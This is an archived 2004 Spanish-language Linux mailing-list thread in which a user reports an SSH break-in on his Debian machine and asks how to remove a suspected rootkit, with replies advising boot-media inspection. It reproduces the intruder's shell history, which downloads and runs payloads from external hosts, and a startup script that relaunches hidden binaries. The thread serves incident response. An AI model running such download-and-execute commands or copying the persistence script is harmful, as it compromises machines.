Y la direcci�n del paper es......? ;-)
Saludos Marcelo
Arturo "Buanzo" Busleiman escribi�:
Bajate un cd de knoppix o live-cd de gentoo, montate las particiones y revisa los scripts de inicio y la config del bootloader (lilo/grub). Ahi generalmente se levantan los rootkits. Yo escribi un paper acerca del tema... "Detecting and Understanding Rootkits: An Introduction and just a little-bit more". Ojala te sirva.
-- Arturo "Buanzo" Busleiman - www.buanzo.com.ar - GNU/Linux Documentation President, Open Information System Security Group - Argentina
"En teoria, no existe diferencia entre teoria y practica. Pero, en la practica, esto no es asi."
On Wed, 16 Jun 2004, FGG wrote:
Hola todos, Les queria hacer una consulta ya que haces unas dias me entraron a mi pc que tenia y tiene linux, la cual normalmente esta encendida las 24hs con un Adsl. Tiene corriendo un Debian Woody que cada dos aprox. le hago un apt-get upgrade. Ingresaron por el sshd, me cambiaron a protocolo 1 y me modificaron el .conf
Les muestro lo q instalaron.
Este es el historico del usuario q usaron: ---------------------------------------------------------------- uname -a wget jhonyboy.home.ro/t.tgz rm -rf no_user.phtml cd .ssh cd cd .ssh id wget netpunk.home.ro/t.tgz tar -zvf t.tgz ./t tar -xzvf t.tgz ./t wget jhonyboy.home.ro/ups chmod +x ups ./ups ls ./ups ----------------------------------------------------------------------------------- Esto me generaba muchos muchos procesos, q parecian estar muertos, los cuales utilizaban:
C�digo de programa Archivo regular 16516 288523 /usr/X11R6/.zk/echo Biblioteca compartida Archivo regular 90210 159640 /lib/ld-2.2.5.so Biblioteca compartida Archivo regular 1153784 159648 /lib/libc-2.2.5.so 3r Archivo regular 179 225596 /etc/sysconfig/console/load.zk Archivo regular 16516 288523 /usr/X11R6/.zk/echo --------------------------------------------------------------------------------------------- Script: ************************************************************** linux:/etc/sysconfig/console# ll total 4 -rwxr-xr-x 1 root root 179 Jun 1 11:18 load.zk linux:/etc/sysconfig/console# cat load.zk #!/bin/sh # Script used by the kernel init interface export LOGIN=ZK /usr/bin/run /usr/X11R6/.zk/echo >> /dev/null 2>&1 /usr/bin/run /usr/X11R6/.zk/xfs -p 7111 >> /dev/null 2>&1 linux:/etc/sysconfig/console# ************************************************************ Aclaro q tenia abierto un port (xfs, q lo generaba este script ) q realmente no recuerdo. Ahora elimine todos los scripts pero no habia forma de matar los procesos ya q arrancaban de nuevo, en la consulta al pid mostraba q los scripts estaban "Delet"-> ya q los elimine yo, ademas de estos, tambien llamaban a libc-2.2.5.so y ld-2.2.5.so , los cuales no puedo eliminar. La pregunta puede ser que modificaron libc y ld ? De q fomar se puede solucionar sin pisarlo al Linux ?, en este caso mucho problema no hay por q era una pc comun, pero en el caso de algun server con dias y dias de laburo sobre el...?
Muchas Gracias a Todos! Saludos Francisco.
FGG [EMAIL PROTECTED]
-- Para desuscribirte ten�s que visitar la p�gina https://listas.linux.org.ar/mailman/listinfo/lugar-gral/
Si ten�s alg�n inconveniente o consulta escrib� a mailto:[EMAIL PROTECTED] Apoya al ASLE enviando tu firma http://www.linux.org.ar/asle
-- Marcelo F. Fern�ndez Buenos Aires, Argentina Analista de Sistemas - CCNA
E-Mail: [EMAIL PROTECTED] Jabber ID: [EMAIL PROTECTED]
-- Para desuscribirte ten�s que visitar la p�gina https://listas.linux.org.ar/mailman/listinfo/lugar-gral/
Si ten�s alg�n inconveniente o consulta escrib� a mailto:[EMAIL PROTECTED] Apoya al ASLE enviando tu firma http://www.linux.org.ar/asle
